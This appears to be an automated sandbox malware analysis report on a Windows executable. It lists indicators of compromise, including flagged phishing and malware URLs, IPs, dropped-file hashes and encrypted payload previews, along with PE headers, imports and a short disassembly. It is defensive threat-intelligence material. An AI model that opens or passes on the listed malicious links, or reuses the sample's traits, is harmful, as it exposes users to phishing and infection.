                  https://url.au.m.mimecastprotect.com/s/PfBWC4QZ15ukx20VsOfYC4BNEn?domain=incleecl.comGet hashmaliciousUnknownBrowse
                  • 108.138.26.2
                  CraxsLoader.exeGet hashmaliciousRedLineBrowse
                  • 13.48.78.154
                  bb2.exeGet hashmaliciousUnknownBrowse
                  • 3.64.163.50
                  http://www.conchtech.com/Get hashmaliciousUnknownBrowse
                  • 13.33.187.103
                  https://www.nyar-messenger.com/wp-content/87627428349820389/2FA.htmlGet hashmaliciousUnknownBrowse
                  • 3.123.20.17
                  https://www.nyar-messenger.com/wp-content/87627428349820389/Get hashmaliciousUnknownBrowse
                  • 3.123.20.17
                  http://www.swit.as/1eGet hashmaliciousUnknownBrowse
                  • 76.76.21.22
                  https://swit.as/1eGet hashmaliciousUnknownBrowse
                  • 76.76.21.98
                  https://smruti-ranjan-sahoo-tech.github.io/NetflixCloneGet hashmaliciousHTMLPhisherBrowse
                  • 18.244.20.103

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\A7b2-53

                  Download File
                  Process:C:\Windows\SysWOW64\rasdial.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\autD149.tmp

                  Download File
                  Process:C:\Users\user\Desktop\220204-TF1--00.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):286208
                  Entropy (8bit):7.993194028254262
                  Encrypted:true
                  SSDEEP:6144:nIypcZ74PSbGZIa3pslSPWxshp29Ed1q1ocXV6i8oTL4wE39f:nIut8a5sl5shw9EfGJV6iBQ3h
                  MD5:29D5C0303EF472D185C3F80544D8A1EB
                  SHA1:9747A915EBA168D6723F72EEE47ADE34E88CA090
                  SHA-256:E106F38411093510087011C357B338B5658560DF92216EB962A8E3E82BFF0569
                  SHA-512:C5B62C02FF2D805DF614F36316C0AC904C8D6DDC49F4424D0BADB0696D009FF0341924B4FBB4AD2381086E78939D2BE3769EC3D222C754F943325790471E2703
                  Malicious:false
                  Reputation:low
                  Preview:.j...0J5J...P....x.J6....ZM..D0J5JZ91YE0BMD0J5JZ91YE0BMD0J5.Z91WZ.LM.9...[u.x.X+>d@8Z-(X\y&Q,#+DjW/zKD7eY,m....'5]TwH=HiD0J5JZ9HXL..-#.wU-..Q>.*...*R.@...yP%.^...v:^..,S*p$W.5JZ91YE0..D0.4KZv...0BMD0J5J.93XN1IMD|N5JZ91YE0B}Q0J5ZZ919A0BM.0J%JZ93YE6BMD0J5J\91YE0BMDPN5JX91YE0BODp.5JJ91IE0BMT0J%JZ91YE BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0Bc0U2AJZ9%.A0B]D0JyNZ9!YE0BMD0J5JZ91Ye0B-D0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91

                  C:\Users\user\AppData\Local\Temp\autD179.tmp

                  Download File
                  Process:C:\Users\user\Desktop\220204-TF1--00.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):15318
                  Entropy (8bit):7.605888844595867
                  Encrypted:false
                  SSDEEP:384:lxFB0xI2k6OP/OMsJMIb7OL+rQnxlFdVl2Xzmz+rHiM:l90xIR/tsJ5uLay76KzW
                  MD5:10E3F657E1E225352731BD4115DB0A3E
                  SHA1:1EA7C8B6FF6EFC27C136A2F7A28880693AE2FB33
                  SHA-256:DC8A2B5F4C8F77CFF0A28A7E2ED28F0A5DE81292176F11294DC42E09726C71A6
                  SHA-512:D574677A5F08196EA7E8256F546062A06F8A799638CC74A2E836C2229C306380F5E9BA96BAE8E9BBE038B12F9A84941409A1CC820861AD5540A5E432BD9D0A3B
                  Malicious:false
                  Reputation:low
                  Preview:EA06..........`...........0.|L.... .>&........ .|N...y..?.2.#.,@.....l.._.................7...,...........}. ...`.'.^.3P......q.M@+..0.?.a.....7...p|.*.............D..K.......0........|60-........ !_D....[|.`.......|.`.?.b......P...n.q....>....1...&........_...g.;.u..W....@N......8....l...&.......z.............6_p:7..d...,.._.%.......|.P...........0V..h.9..w}..O....B..`_.........l.$..$...T.&.(.=.......0..d......}...D..#....'...t.........b?k .G.Aa.....`1..=..#.C..c..1.....C.J......@1..(.#.!...............T}............l...z..P.'....~p.........8?Y.B..1...,@..8B..3.`...)...&....$}.4..(...c..../>..o......I|3`...p.y..E}.0.x%...Q.X@*?.I.f..e...f...........~.=_.....'...........O8...&@/_.8W......X.9.{(...b.j..@._.$..3.@...N..l..h.....|.._E........~..$.......puO.......~.Q;..........K....e.......p4.........60.........v.3q...[.....`.O.HJ+.....g z.p..m4....&@4.8.G...I...>?..ww..M...R..I..2..1.H..T>...G......(}.pF.`/..3..`@................b.F....~....jh........2..

                  C:\Users\user\AppData\Local\Temp\deblateration

                  Download File
                  Process:C:\Users\user\Desktop\220204-TF1--00.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):286208
                  Entropy (8bit):7.993194028254262
                  Encrypted:true
                  SSDEEP:6144:nIypcZ74PSbGZIa3pslSPWxshp29Ed1q1ocXV6i8oTL4wE39f:nIut8a5sl5shw9EfGJV6iBQ3h
                  MD5:29D5C0303EF472D185C3F80544D8A1EB
                  SHA1:9747A915EBA168D6723F72EEE47ADE34E88CA090
                  SHA-256:E106F38411093510087011C357B338B5658560DF92216EB962A8E3E82BFF0569
                  SHA-512:C5B62C02FF2D805DF614F36316C0AC904C8D6DDC49F4424D0BADB0696D009FF0341924B4FBB4AD2381086E78939D2BE3769EC3D222C754F943325790471E2703
                  Malicious:false
                  Reputation:low
                  Preview:.j...0J5J...P....x.J6....ZM..D0J5JZ91YE0BMD0J5JZ91YE0BMD0J5.Z91WZ.LM.9...[u.x.X+>d@8Z-(X\y&Q,#+DjW/zKD7eY,m....'5]TwH=HiD0J5JZ9HXL..-#.wU-..Q>.*...*R.@...yP%.^...v:^..,S*p$W.5JZ91YE0..D0.4KZv...0BMD0J5J.93XN1IMD|N5JZ91YE0B}Q0J5ZZ919A0BM.0J%JZ93YE6BMD0J5J\91YE0BMDPN5JX91YE0BODp.5JJ91IE0BMT0J%JZ91YE BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0Bc0U2AJZ9%.A0B]D0JyNZ9!YE0BMD0J5JZ91Ye0B-D0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91YE0BMD0J5JZ91

                  C:\Users\user\AppData\Local\Temp\syphilous

                  Download File
                  Process:C:\Users\user\Desktop\220204-TF1--00.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:dropped
                  Size (bytes):200730
                  Entropy (8bit):2.756804786587208
                  Encrypted:false
                  SSDEEP:192:dQyw4U1Emh0cHgDQNMo4eutXGlERJGrbmqsaogDVA9+ls4BqlF9HIrwVmclVw6Xx:j
                  MD5:012594164A9B654B9CEE6E03B8DFB589
                  SHA1:855BE45E6EEC2530F907399689C878A7C87060EA
                  SHA-256:5F9CC263CEED31FCC682B595B89D2C0B21111AFD2C5D53564889F74213D3E331
                  SHA-512:7690EC74084A0A530ABDBC081F29906C3FDF6F2D6820552077A44F461D8F42DFD93E33D07725A0C14C900D7B903F996C703FC436C93F30F77ECC1433B1F735A1
                  Malicious:false
                  Reputation:low
                  Preview:9200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016092001609200160920016

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.187205175540543
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:220204-TF1--00.exe
                  File size:1'191'424 bytes
                  MD5:7054b5f008cd2514db7b7cda8149978a
                  SHA1:831951c823052e1e2537006e617c29b4f0f864d2
                  SHA256:c2f4d2c93d321bffcb638ea1c04436cc5d3837af03c9ad2517e7f4d2eebce887
                  SHA512:36313a2f2c2eb8c9e26fea0e81dec22b3b4b55546da577d4cb36b19467af4cf30c19fc5fd7548912108f89243a801a8866319c3cc47b1cc0f54370b6340d58a9
                  SSDEEP:24576:vAHnh+eWsN3skA4RV1Hom2KXMmHaEqKCBR4urob5eV5:Sh+ZkldoPK8YaEXCBR40wi
                  TLSH:7645BD0273D6C036FFAB92739B6AB20156BD79254133852F13981DB9BDB05B1237E263
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                  File Icon

                  Icon Hash:4a786c6652ece047

                  Static PE Info

                  General

                  Entrypoint:0x42800a
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66D7B02E [Wed Sep 4 00:56:14 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                  Entrypoint Preview

                  Instruction
                  call 00007F90C8C244ADh
                  jmp 00007F90C8C17264h
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push edi
                  push esi
                  mov esi, dword ptr [esp+10h]
                  mov ecx, dword ptr [esp+14h]
                  mov edi, dword ptr [esp+0Ch]
                  mov eax, ecx
                  mov edx, ecx
                  add eax, esi
                  cmp edi, esi
                  jbe 00007F90C8C173EAh
                  cmp edi, eax
                  jc 00007F90C8C1774Eh
                  bt dword ptr [004C41FCh], 01h
                  jnc 00007F90C8C173E9h
                  rep movsb
                  jmp 00007F90C8C176FCh
                  cmp ecx, 00000080h
                  jc 00007F90C8C175B4h
                  mov eax, edi
                  xor eax, esi
                  test eax, 0000000Fh
                  jne 00007F90C8C173F0h
                  bt dword ptr [004BF324h], 01h
                  jc 00007F90C8C178C0h
                  bt dword ptr [004C41FCh], 00000000h
                  jnc 00007F90C8C1758Dh
                  test edi, 00000003h
                  jne 00007F90C8C1759Eh
                  test esi, 00000003h
                  jne 00007F90C8C1757Dh
                  bt edi, 02h
                  jnc 00007F90C8C173EFh
                  mov eax, dword ptr [esi]
                  sub ecx, 04h
                  lea esi, dword ptr [esi+04h]
                  mov dword ptr [edi], eax
                  lea edi, dword ptr [edi+04h]
                  bt edi, 03h
                  jnc 00007F90C8C173F3h
                  movq xmm1, qword ptr [esi]
                  sub ecx, 08h
                  lea esi, dword ptr [esi+08h]
                  movq qword ptr [edi], xmm1
                  lea edi, dword ptr [edi+08h]
                  test esi, 00000007h
                  je 00007F90C8C17445h
                  bt esi, 03h

                  Rich Headers

                  Programming Language:
                  • [ASM] VS2013 build 21005
                  • [ C ] VS2013 build 21005
                  • [C++] VS2013 build 21005
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [ASM] VS2013 UPD5 build 40629
                  • [RES] VS2013 build 21005
                  • [LNK] VS2013 UPD5 build 40629

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x58690.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1210000x7134.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0xc80000x586900x588004da44ab99ea911a52ab8f10c6f852ce8False0.9667610125353108data7.966717474567678IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x1210000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0xc84880x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                  RT_ICON0xc85b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                  RT_ICON0xc86d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                  RT_ICON0xc88000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.28189493433395874
                  RT_ICON0xc98a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.5487588652482269
                  RT_MENU0xc9d100x50dataEnglishGreat Britain0.9
                  RT_STRING0xc9d600x594dataEnglishGreat Britain0.3333333333333333
                  RT_STRING0xca2f40x68adataEnglishGreat Britain0.2747909199522103
                  RT_STRING0xca9800x490dataEnglishGreat Britain0.3715753424657534
                  RT_STRING0xcae100x5fcdataEnglishGreat Britain0.3087467362924282
                  RT_STRING0xcb40c0x65cdataEnglishGreat Britain0.34336609336609336
                  RT_STRING0xcba680x466dataEnglishGreat Britain0.3605683836589698
                  RT_STRING0xcbed00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                  RT_RCDATA0xcc0280x5413cdata1.0003368372147048
                  RT_GROUP_ICON0x1201640x22dataEnglishGreat Britain1.0588235294117647
                  RT_GROUP_ICON0x1201880x14dataEnglishGreat Britain1.25
                  RT_GROUP_ICON0x12019c0x14dataEnglishGreat Britain1.15
                  RT_GROUP_ICON0x1201b00x14dataEnglishGreat Britain1.25
                  RT_VERSION0x1201c40xdcdataEnglishGreat Britain0.6181818181818182
                  RT_MANIFEST0x1202a00x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                  Imports

                  DLLImport
                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                  PSAPI.DLLGetProcessMemoryInfo
                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                  UxTheme.dllIsThemeActive
                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishGreat Britain

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
